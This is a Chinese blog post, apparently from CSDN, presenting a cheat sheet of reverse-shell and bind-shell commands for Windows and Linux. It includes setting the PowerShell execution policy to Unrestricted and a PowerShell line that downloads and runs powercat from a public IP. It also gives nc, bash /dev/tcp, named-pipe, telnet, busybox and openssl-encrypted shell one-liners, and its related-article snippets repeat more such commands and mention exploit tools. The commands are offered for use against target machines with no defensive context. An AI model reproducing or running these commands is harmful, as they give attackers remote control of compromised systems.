反弹shell

最新推荐文章于 2025-04-08 10:40:52 发布
最新推荐文章于 2025-04-08 10:40:52 发布
阅读量223 收藏 1
点赞数
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_59607911/article/details/133880864
版权
本文详细介绍了Windows和Linux系统中如何通过powershell和nc工具实现反弹shell,包括权限设置、不同类型的shell反弹方法以及SSL加密的使用。还提及了利用BusyBox进行反弹shell的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一,windows反弹shell

执行powershell脚本需要修改powershell权限:
 
命令执行设置powershell权限:
 
        powershell Set-ExecutionPolicy Unrestricted
 
四种权限:
 
1、Restricted: 默认设置,不允许执行任何脚本
 
2、Allsigned:只能运行经过证书验证的脚本
 
3、Unrestricted: 权限最高,可以执行任意脚本
 
4、RemoteSigned: 对本地脚本不进行限制;对来自网络的脚本必须验证其签名
 
 查询当前权限:    Get-ExecutionPolicy
 
修改为最高权限:   Set-ExecutionPolicy Unrestricted
 
恢复最低权限:    Set-ExecutionPolicy Restricted
 
powershell反弹shell
 
powershell IEX(New-Object System.Net.Webclient).DownloadString('http://150.158.155.208/powercat.ps1');powercat -c 150.158.155.208 -p 6666 -e cmd

nc反弹 

nc64.exe -e cmd 150.158.155.208 12341

二,linux 反弹shell(目标机开启)

shell反弹

bash -i >& /dev/tcp/192.168.0.1/65535 0>&1
 

 
sh -i >& /dev/tcp/192.168.0.1/65535 0>&1 

nc反弹 

#!/bin/bash
nc -e /bin/bash 192.168.0.1 65535
 
 
#!/bin/bash
/bin/bash | nc 192.168.0.1 65535
 
 
#!/bin/bash
nc 192.168.0.1 65535 |/bin/bash
 
 
#!/bin/bash
rm -f /tmp/p;
 
mknod /tmp/p p && nc 192.168.0.1 65535 0/tmp/
 
 
#!/bin/bash
rm /tmp/f;
 
mkfifo /tmp/f;
 
cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.1 65535 >/tmp/f

telnet反弹 

#!/bin/bash
telnet 192.168.0.1 65534 | /bin/bash | telnet 192.168.0.1 65535
 
 
#!/bin/bash
mknod backpipe p && telnet 192.168.0.1 65535 0<backpipe | /bin/bash 1>backpipe

busybox反弹shell 

当存在硬链接时如将/bin/sh命令指向/bin/busybox,可以使用busybox进行反弹shell

lrwxrwxrwx    1 root     root            12 Jan 30  2019 /bin/sh -> /bin/busybox

     /bin/busybox nc 150.158.155.208 6666 -e /bin/sh
 

 三,linux正向shell(攻击机开启监听)

靶机开启监听:

nc -lvp 666

nc -lvp 10000 -e /bin/bash

 

 

攻击机连接靶机:

nc64.exe 150.158.155.208 10000 

 

四,SSL加密反弹shell:

1、vps上先生成key.pem和cert.pem文件,一路回车即可

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

 

2、然后使用openssl设置监听端口,这里要带上key.pem和cert.pem

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

 

3、在靶机上执行反弹shell命令即可

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 150.158.155.208:3333 > /tmp/s; rm /tmp/s

 

[ 隧道技术 ] 反弹shell的集中常见方式(三)powercat反弹shell
qq_51577576的博客
09-04 838
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
powershell反弹shell
x10n9的博客
03-09 606
powershell反弹shell
渗透测试中反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
Libra1313的博客
04-08 1130
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
PowerShell 反弹渗透技巧
weixin_30790841的博客
08-15 292
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具、简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windo...
[Shell]Powershell反弹shell
baguangman5501的博客
09-08 1305
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。...
各种powershell反弹脚本
weixin_30235225的博客
05-25 160
含(tcp/udp/icmp/dns/http/wmi/http/https) https://github.com/samratashok/nishang/tree/master/Shells 还想再提一下这个项目(powershell版的nc) https://github.com/besimorhino/powercat ## 来源 http://www.labofa...
网络安全基础入门反弹SHELL与正反向连接技术:防火墙绕过及文件下载命令详解
最新发布
04-22
内容概要:本文档主要介绍了基础入门级别的反弹SHELL、不回显带外、正反向连接、防火墙出入站规则以及文件下载等技术。涵盖Web常规、Web其他、Web拓展、APP架构、小程序架构等方面的知识点。详细讲解了渗透命令如...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
powershell反弹shell常见方式
UKK
03-05 2000
powershell反弹shell常见方式 http://www.ifind.cc/view/154
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
Linux反弹shell姿势复现(二)--- 利用下载的工具执行反弹(busybox)
weixin_44283446的博客
04-06 2538
Linux反弹shell姿势复现(二)--- 利用下载工具执行反弹(busybox)前言复现环境说明利用下载工具执行反弹(busybox)什么是busybox?方法一方法二 前言 本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! 复现环境说明 服务端(被监听)(ubuntu使用cat /proc/version查看,centos使用cat /etc/system-release查看):ubuntu 5.4.0-67-generic; centos:CentOS Linux release
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2278
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
【信息安全反弹shell
Nicky_Zheng的博客
12-02 265
1、windows-powershell反弹shell kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali windows端 $client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte
反弹shell总结
桀骜不逊
02-09 1197
nc反弹shell 正向shell nc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机) nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机) nc host.example.com 1234 # linux 客户端 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.
Busybox不用回车直接进入shell
yclz的专栏
03-06 1320
在init/init.c里的run函数中将if (a->action & ASKFIRST) { char c; messageD(LOG, "Waiting for enter to start %s" "(pid %d, terminal %s)/n", cmdpath, getpid(), a->terminal); bb_full_write(1, press_enter, siz
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值